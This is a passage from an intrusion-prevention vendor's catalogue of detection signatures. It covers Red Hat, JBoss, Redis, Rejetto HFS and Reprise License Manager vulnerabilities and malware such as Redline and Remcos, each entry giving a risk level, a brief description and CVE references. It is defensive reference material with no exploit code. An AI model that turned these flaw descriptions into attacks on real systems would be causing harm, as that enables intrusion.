CVE-2008-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2928
BID-30869
http://www.securityfocus.com/bid/30869
Back to top

Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow

About this vulnerability: A vulnerability in GNU C Library Project GNU C Library
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux; Red Hat Enterprise Linux
Software: <os>
Type: Malfunction
Description: A vulnerability exists in the DNS stub resolver library in ISC BIND that also affects the resolver component of older versions of the glibc library. This vulnerability has been known for some time, but has gone unfixed in several versions of the Red Hat Linux operating systems until recently. This can allow an attacker to send a malicious DNS response packets to a vulnerable system to cause a denial of service condition or execution of arbitrary code. As noted in section 4.1 "Technical Mechanisms", it is difficult for an attacker to exploit this vulnerability to create a denial of service condition or execute arbitrary code. If a sophisticated attacker can craft such an exploit, then in the denial of service case, the process using the glibc resolver library is expected to terminate with a memory access violation. This can result in a denial of service condition if the process which terminated was acting as a local or network service. In a code injection attack, the behaviour of the attack target is dependant on the nature of the injected code. The injected code would be executed in the security context of the process which made the DNS query.
Situation: DNS-UDP_Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow
References:
CVE-2002-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0029
BID-6186
http://www.securityfocus.com/bid/6186
Back to top

Red-Hat-Installation-Package

About this vulnerability: Red Hat binary installation package
Risk: Low
First detected in: sgpkg-ips-188-2032
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux; Fedora Linux; Mandrake Linux; SUSE Linux
Software: <os>
Type: Insecure Configuration
Description: The Red Hat distribution, as well as other Linux distributions that are based on Red Hat, such as Fedora, use specific binary packages for application installation. These installation packages can be used to import executable content into the target system.
Situation: HTTP_SS-Red-Hat-Binary-Installation-Package-Download
File-Binary_Red-Hat-Binary-Installation-Package
Back to top

Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization

About this vulnerability: A vulnerability in Red Hat JBoss Enterprise Application Platform
Risk: Moderate
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Enterprise Application Platform
Type: Malfunction
Description: There is a deserialization vulnerability in Red Hat JBoss Application server. A remote, unauthenticated attacker can exploit this vulnerability and run arbitrary code in the system.
Situation: File-Binary_Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization
References:
CVE-2017-12149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12149
Back to top

Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting

About this vulnerability: A vulnerability in Red Hat JBoss BPMS
Risk: Moderate
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: JBoss
Type: Input Validation
Description: Insufficient validation of HTTP request data in the Tasks List component of JBoss causes a cross-site scripting vulnerability, which can be exploited to gain the ability to execute arbitrary scripts in the user's web browser.
Situation: HTTP_CS-Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting
References:
CVE-2017-2674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2674
Back to top

Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization

About this vulnerability: A vulnerability in Red Hat JBoss Data Grid
Risk: Moderate
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Data Grid
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in the Hotrod client. Successful exploitation can result in arbitrary code execution.
Situation: Generic_CS-Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization
References:
CVE-2017-15089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15089
Back to top

Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure

About this vulnerability: A vulnerability in Red Hat JBoss Seam
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Enterprise Application Platform
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Red Hat JBoss Seam Framework. This is due to an incorrectly configured XML parser accepting XML eXternal Entities (XXE) from untrusted sources being used by the ExecutionHandler, PollHandler, and SubscriptionHandler classes within the JBoss Seam Framework's Remoting component. A remote unauthenticated attacker may exploit this vulnerability on a web application powered by the JBoss Seam Framework to disclose the contents of files via specially crafted XML documents.
Situation: HTTP_CS-Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure
References:
CVE-2013-6447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6447
BID-65051
http://www.securityfocus.com/bid/65051
OSVDB-102345
http://www.osvdb.org/102345
Back to top

Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure

About this vulnerability: A vulnerability in Red Hat JBoss Seam
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Enterprise Application Platform
Type: Malfunction
Description: An information disclosure vulnerability exists in Red Hat JBoss Seam Framework. This is due to a design flaw in the InterfaceGenerator handler that allows it to expose details of all classes on the server's classpath. A remote unauthenticated attacker may exploit this vulnerability on a web application powered by the JBoss Seam Framework to determine which classes are deployed on the server.
Situation: HTTP_CSU-Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure
References:
CVE-2013-6448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6448
BID-65049
http://www.securityfocus.com/bid/65049
OSVDB-102344
http://www.osvdb.org/102344
Back to top

Red-Hat-librelp-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Red Hat librelp
Risk: High
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Enterprise Linux
Software: <os>
Type: Buffer Overflow
Description: A vulnerability in Red Hat librelp, versions prior to 1.2.15, which allows remote attackers to execute code by sending a crafted Reliable Event Logging Protocol message, due to the incorrect sanitisation of x509 certificates.
Situation: HTTPS_CS-Red-Hat-librelp-Stack-Buffer-Overflow
References:
CVE-2018-1000140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000140
Back to top

Red-Hat-Netkvm-Virtio-Win-GetXxpHeaderAndPayloadLen-Integer-Underflow

About this vulnerability: A vulnerability in Red Hat virtio-win
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux
Software: <os>
Type: Integer Overflow
Description: A denial of service vulnerability has been reported in Red Hat virtio-win NetKVM driver. The vulnerability is due to a failure to sufficiently sanitize the length of incoming IP packets. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted IP packet to a server. Successful exploitation could lead to a denial of service condition.
Situation: IP_Length-Total-Error
IP_Length-Total-Error
IPv6_Extension-headers-incomplete
IPv6_Extension-headers-incomplete
References:
CVE-2015-3215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3215
Back to top

Red-Hat-Networkmanager-DHCP-Command-Injection

About this vulnerability: A vulnerability in Red Hat RPM resource
Risk: Moderate
First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat RPM resource
Type: Input Validation
Description: There has been reported a command injection vulnerability in the Red Hat Network Manager. A remote attacker can exploit this vulnerability by sending malicious DHCP responses to a target client. Successful exploitation results in arbitrary command execution.
Situation: BOOTP_CS-Red-Hat-Networkmanager-DHCP-Command-Injection
References:
CVE-2018-1111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111
Back to top

Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion

About this vulnerability: A vulnerability in Red Lion Crimson
Risk: Moderate
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Lion Crimson
Type: Malfunction
Description: There exists a type confusion vulnerability in Red Lion Crimson. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion
References:
CVE-2019-10984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10984
Back to top

Red-Lion-Crimson-CD3-Port-List-Type-Confusion

About this vulnerability: A vulnerability in Red Lion Crimson
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Lion Crimson
Type: Malfunction
Description: Improper handling of malformed CD3 file structures causes a type confusion vulnerability in Red Lion Crimson. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-Text_Red-Lion-Crimson-CD3-Port-List-Type-Confusion
References:
CVE-2019-10996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10996
Back to top

Red-October

About this vulnerability: Red October
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Red October is a cyber espionage network that targets Diplomatic and Government agencies. The infection spreads through malicious e-mail attachments and links.
Situation: HTTP_CSH-Red-October-Activity
Back to top

Redaeefe-Trojan-Infection-Traffic

About this vulnerability: Redaeefe trojan infection traffic
Risk: High
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Redaeefe trojan infection traffic was detected.
Situation: HTTP_CRL-Redaeefe-Trojan-Infection-Traffic
Back to top

Redgirl-Bot

About this vulnerability: RedGirl Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: RedGirl is a Trojan that opens a backdoor on the infected machine to allow a remote attacker access to it.
Situation: HTTP_CSH-Redgirl-Bot-Traffic
Back to top

Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Authentication-Bypass

About this vulnerability: A vulnerability in Red Hat JBoss Enterprise Application Platform
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Enterprise Application Platform; Red Hat JBoss Enterprise Application Platform
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in JBoss Enterprise Application Platform JMX Console application. The vulnerability is caused by the authentication policy within the application that only enforces restrictions for GET and POST methods, other HTTP request verbs bypass authentication. Unauthenticated remote attackers could exploit this vulnerability to gain administrative access to JBoss JMX management console and to upload and execute arbitrary Java code within the security context of the JBoss server process, normally SYSTEM on Windows platforms.
Situation: HTTP_CSU-Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Auth-Bypass
References:
CVE-2010-0738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
BID-39710
http://www.securityfocus.com/bid/39710
Back to top

Redhat-Jboss-JNDI-Lack-of-Authentication

About this vulnerability: A Redhat Jboss JNDI Lack of Authentication vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux
Software: Red Hat JBoss Enterprise Application Platform
Type: Misconfiguration
Description: A vulnerability in RedHat JBoss JNDI which allows remote attackers to gain escalated privileges and access to target servers due to the lack of authentication when adding, deleting, and modifying items in the JNDI tree.
Situation: Generic_CS-Redhat-Jboss-JNDI-Lack-of-Authentication
References:
CVE-2011-4605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4605
Back to top

Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Redis
Risk: High
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: Redis
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in Redis. The vulnerability is due to improper validation of user input when extracting keys from a command. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial-of-service condition and, in the worst case scenario, arbitrary code execution in the security context of the Redis process.
Situation: Generic_CS-Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow
References:
CVE-2023-36824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36824
Back to top

Redis-Hrandfield-Zrandmember-Command-Integer-Overflow

About this vulnerability: A vulnerability in Redis
Risk: Moderate
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Platform: Generic
Software: Redis
Type: Integer Overflow
Description: A denial of service vulnerability has been reported for Redis. This vulnerability is due an integer overflow error when handling the HRANDFIELD and ZRANDMEMBER commands. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: Generic_CS-Redis-Hrandfield-Zrandmember-Command-Integer-Overflow
References:
CVE-2023-22458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22458
Back to top

Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Redis Labs Redis
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Redis
Type: Buffer Overflow
Description: A stack buffer overflow has been reported in Redis. The vulnerability is due to insufficient handling of the PFCOUNT command on HyperLogLog structures which have been corrupted using one of several possible commands. A remote attacker can exploit this vulnerability by sending crafted commands to the target server followed by a PFCOUNT command. Successful exploitation could result in the execution of arbitrary code as the user running Redis.
Situation: Generic_CS-Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow
References:
CVE-2019-10193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10193
Back to top

Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Redis Labs Redis
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Redis
Type: Buffer Overflow
Description: A heap buffer overflow has been reported in Redis. The vulnerability is due to insufficient handling of crafted HyperLogLog structures utilizing sparse encoding when converting the structure to dense encoding. A remote attacker can exploit this vulnerability by sending crafted commands to the target server followed by a PFADD command that triggers conversion of a sparsely encoded HyperLogLog structure to dense encoding. Successful exploitation could result in the execution of arbitrary code as the user running Redis.
Situation: Generic_CS-Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow
References:
CVE-2019-10192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10192
Back to top

Redis-Lua-Sandbox-Escape-CVE-2022-0543

About this vulnerability: A vulnerability in Redis
Risk: High
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Platform: Generic
Software: Redis
Type: Malfunction
Description: A Lua-based sandbox escape has been reported in Debian and Ubuntu Redis packages. Succesful exploitation of this vulnerability could allow unauthenticated attackers to execute arbitrary code.
Situation: Generic_CS-Redis-Lua-Sandbox-Escape-CVE-2022-0543
References:
CVE-2022-0543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0543
Back to top

Redis-Lua-Scripting-Component-Getnum-Integer-Overflow

About this vulnerability: A vulnerability in Redis Labs Redis
Risk: High
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Redis
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Redis. A remote attacker can use this to acchieve arbitrary code execution on the affected machine.
Situation: Generic_CS-Redis-Lua-Scripting-Component-Getnum-Integer-Overflow
References:
CVE-2015-8080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8080
Back to top

Redis-Msetnx-Command-Denial-Of-Service

About this vulnerability: A vulnerability in Redis
Risk: Moderate
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: Redis
Type: Input Validation
Description: A denial of service vulnerability has been reported in Redis. The vulnerability is due to improper input validation of user input to the MSETNX command. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial of service conditions on the target server.
Situation: Generic_CS-Redis-Msetnx-Command-Denial-Of-Service
References:
CVE-2023-28425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28425
Back to top

Redis-Replication-Code-Execution

About this vulnerability: A vulnerability in Redis
Risk: Moderate
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Linux
Software: Redis
Type: Insecure Configuration
Description: There exists a vulnerability in Redis, starting in version 4.0.0, which allowes remote attackers to modify or add any data into the databse and register a rogue servers.
Situation: Generic_CS-Redis-Replication-Code-Execution
Back to top

Redis-Scan-Keys-Command-Denial-Of-Service

About this vulnerability: A vulnerability in Redis.
Risk: Moderate
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Platform: Generic
Software: Redis
Type: Input Validation
Description: A vulnerability in Redis, versions 6.0.x prior to 6.0.18, 6.2.x prior to 6.2.11, and 7.0.x prior to 7.0.9, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to the improper input validation when string pattern matching for commands.
Situation: Generic_CS-Redis-Scan-Keys-Command-Denial-Of-Service
References:
CVE-2022-36021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36021
Back to top

Redis-Setrange-Sort-Command-Integer-Overflow

About this vulnerability: A vulnerability in Redis.
Risk: High
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Redis
Type: Integer Overflow
Description: A vulnerability in Redis, versions 6.0.0 above and prior to 6.0.17, 6.2.0 above and prior to 6.2.9, and 7.0.0 above and prior to 7.0.8, which allows remote attackers to create a denial of service condition by sending a crafted request to the target server, due an integer overflow error when handling the SETRANGE, SORT, and SORT_RO commands.
Situation: Generic_CS-Redis-Setrange-Sort-Command-Integer-Overflow
References:
CVE-2022-35977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35977
Back to top

Redis-SSH-Authorized-Keys-Overwrite

About this vulnerability: A vulnerability in Redis Labs Redis
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Redis
Type: Misconfiguration
Description: The Redis service can by design write to any file within the reach of the user running the service, including the .ssh/authorized_keys file of the user. When the service is configured without authentication, this may lead to system compromise as a remote client may simply install their own SSH-key by overwriting the authorized_keys file of the user running the Redis server.
Situation: Generic_CS-Redis-SSH-Authorized-Keys-Overwrite
Back to top

Redis-Unauthenticated-Code-Execution

About this vulnerability: A vulnerability in Redis
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Redis
Type: Input Validation
Description: A vulnerability in Redis, versions 4.x and 5.x, which allows remote attackers to execute arbitrary code do to insufficient user input validation.
Situation: Generic_CS-Redis-Unauthenticated-Code-Execution
Back to top

Redis-Xautoclaim-Command-Count-Integer-Overflow

About this vulnerability: A vulnerability in Redis
Risk: Moderate
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1511-5242
Platform: Generic
Software: Redis
Type: Integer Overflow
Description: Improper handling of the COUNT argument in the XAUTOCLAIM command causes an integer overflow vulnerability in Redis. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Redis-Xautoclaim-Command-Count-Integer-Overflow
References:
CVE-2022-35951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35951
Back to top

Redline-Password-Stealer-Infection-Traffic

About this vulnerability: Redline Password Stealer infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Redline Password Stealer infection traffic was detected.
Situation: Generic_CS-Redline-Password-Stealer-Infection-Traffic
HTTP_CSH-Redline-Password-Stealer-Infection-Traffic
Back to top

Redmine-Bazaar-Repository-Adapter-Command-Execution

About this vulnerability: A Redmine Bazaar Repository Adapter Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Redmine
Type: Input Validation
Description: A vulnerability in Redmine Bazaar Repository Adapter, versions 0.9.x and 1.0.x before 1.0.5, which allows remote attackers to execute arbitrary commands via the rev parameter.
Situation: HTTP_CSU_Redmine-Bazaar-Repository-Adapter-Command-Execution
References:
CVE-2011-4929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4929
BID-45571
http://www.securityfocus.com/bid/45571
OSVDB-70090
http://www.osvdb.org/70090
Back to top

Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Risk: High
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1742-5242
Platform: Windows
Software: Rejetto HttpFileServer
Type: Input Validation
Description: A vulnerability in Rejetto Http File Server, version 2.x, which allows remote attackers to execute arbitrary code by injecting a malicious template, due to insufficient input validation.
Situation: HTTP_CRL-Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE
References:
CVE-2024-23692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23692
Back to top

Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943

About this vulnerability: A vulnerability in Rejetto HTTP File Server
Risk: High
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Rejetto HttpFileServer
Type: Input Validation
Description: A command injection vulnerability has been reported for Rejetto HTTP File Server (HFS). This vulnerability is due to improper input validation of folder names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary command execution in the security context of the server process.
Situation: HTTP_CS-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CS-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943
References:
CVE-2024-39943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39943
Back to top

Rejetto-HttpFileServer-Remote-Command-Execution

About this vulnerability: A Rejetto HttpFileServer Remote Command Execution Vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rejetto HttpFileServer
Type: Input Validation
Description: A vulnerability in Rejetto HttpFileServer, versions before 2.3c, which allows remote attackers to execute arbitrary commands in a search action by using a %00 sequence to bypass input filtering.
Situation: HTTP_CSU-Rejetto-HttpFileServer-Remote-Command-Execution
References:
CVE-2014-6287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
Back to top

Remcos-RAT-C2-Traffic

About this vulnerability: Remcos RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Remcos is a remote access tool sold by Breaking Security. The company says the tool is only sold for legitimate purposes, but it's constantly used in malicious campaigns.
Situation: Generic_CS-Remcos-RAT-C2-Traffic
Back to top

Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352

About this vulnerability: An attempt to exploit a vulnerability in Zimbra Collaboration Suite detected
Risk: High
First detected in: sgpkg-ips-1515-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Zimbra Collaboration Server
Type: Input Validation
Description: An issue was discovered in Zimbra Collaboration Suite 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts.
Situation: File-Binary_Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
File-Binary_Suspicious-Link-Name-In-Tar-Archive
References:
CVE-2022-41352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41352
Back to top

Remote-Desktop-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Windows
Situation: Generic_CS-Remote-Desktop-Code-Execution-Vulnerability
References:
CVE-2012-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
BID-52354
http://www.securityfocus.com/bid/52354
OSVDB-80000
http://www.osvdb.org/80000
MS12-020
http://technet.microsoft.com/security/bulletin/MS12-020
Back to top

Remote-Desktop-Protocol-Vulnerability

About this vulnerability: A vulnerability in Windows Remote Desktop Protocol
Risk: High
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Windows
Situation: Generic_CS-Remote-Desktop-Protocol-Vulnerability
References:
CVE-2012-2526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2526
MS12-053
http://technet.microsoft.com/security/bulletin/MS12-053
Back to top

Remote-Mouse-RCE

About this vulnerability: A vulnerability in Remote Mouse.
Risk: High
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Platform: Windows
Software: Remote Mouse
Type: Insecure Configuration
Description: A vulnerability in Remote Mouse which allows remote attackers to deploy a payload and run it from the server.
Situation: Generic_CS-Remote-Mouse-RCE
References:
CVE-2022-3365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3365
Back to top

Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532

About this vulnerability: An attempt to exploit a vulnerability in Windows' Remote Registry client detected
Risk: High
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: This fingerprint detects attempts to exploit an elevation of privilege (EoP) vulnerability in Microsoft's Remote Registry client (CVE-2024-43532). The vulnerability involves a fallback mechanism in the client's implementation that uses obsolete transport protocols insecurely if the SMB transport is unavailable. By exploiting it, an attacker can relay the client's NTLM authentication details to the Active Directory Certificate Services (ADCS) and request a user certificate to leverage for further authentication in the domain.
Situation: MSRPC-TCP_Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532
References:
CVE-2024-43532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43532
Back to top

Reolink-Testemail-OS-Command-Injection-CVE-2019-11001

About this vulnerability: A vulnerability in Reolink devices
Risk: High
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Platform: Generic
Software: Reolink
Type: Input Validation
Description: A command injection vulnerability has been reported in the TestEmail functionality of the Reolink RLC-410W, RLC-422W, and RLC-511W devices. An authenticated admin user can exploit this vulnerability to execute arbitrary OS commands via a crafted HTTP request.
Situation: HTTP_CRL-Reolink-Testemail-OS-Command-Injection-CVE-2019-11001
References:
CVE-2019-11001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11001
Back to top

Reprise-License-Manager-Diagnostics_doit-Directory-Traversal

About this vulnerability: A vulnerability in Reprise Software License Manager
Risk: Moderate
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Reprise Software License Manager; Borland AccuRev
Type: Directory Traversal
Description: A path traversal vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation while processing HTTP requests to the "/goform/diagnostics_doit" URI. A remote unauthenticated attacker can leverage this vulnerability by sending crafted HTTP requests to the target system. Successful exploitation would allow an attacker to cause a denial of service condition on the affected system by overwriting arbitrary files with diagnostic information.
Situation: HTTP_CRL-Reprise-License-Manager-Diagnostics_doit-Directory-Traversal
Back to top

Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal

About this vulnerability: A vulnerability in Reprise Software License Manager
Risk: Moderate
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Reprise Software License Manager; Borland AccuRev
Type: Directory Traversal
Description: A directory traversal vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation while processing HTTP requests to the edit_lf_get_data operation. A remote authenticated attacker can leverage this vulnerability by sending crafted HTTP requests to the target system. Successful exploitation would lead to information disclosure via reading of arbitrary files on the target system.
Situation: HTTP_CRL-Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal
Back to top

Reprise-License-Manager-Edit_lf_Process-Directory-Traversal

About this vulnerability: A vulnerability in Reprise Software License Manager
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Reprise Software License Manager; Borland AccuRev
Type: Directory Traversal
Description: Arbitrary code can be executed by an attacker by exploiting a directory traversal vulnerability caused by insufficient validation when parsing HTTP requests.
Situation: HTTP_CRL-Reprise-License-Manager-Edit_lf_Process-Directory-Traversal
Back to top

Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Reprise Software License Manager
Risk: Moderate
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Reprise Software License Manager; Borland AccuRev
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation of the licfile and debuglog parameters while processing an HTTP request. Successful exploitation would lead to arbitrary code execution under the security context of the running process. An unsuccessful exploit attempt would lead to the rlm.exe process terminating abnormally, denying service to legitimate users.
Situation: HTTP_CRL-Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow
Back to top

Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Reprise Software License Manager
Risk: Moderate
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
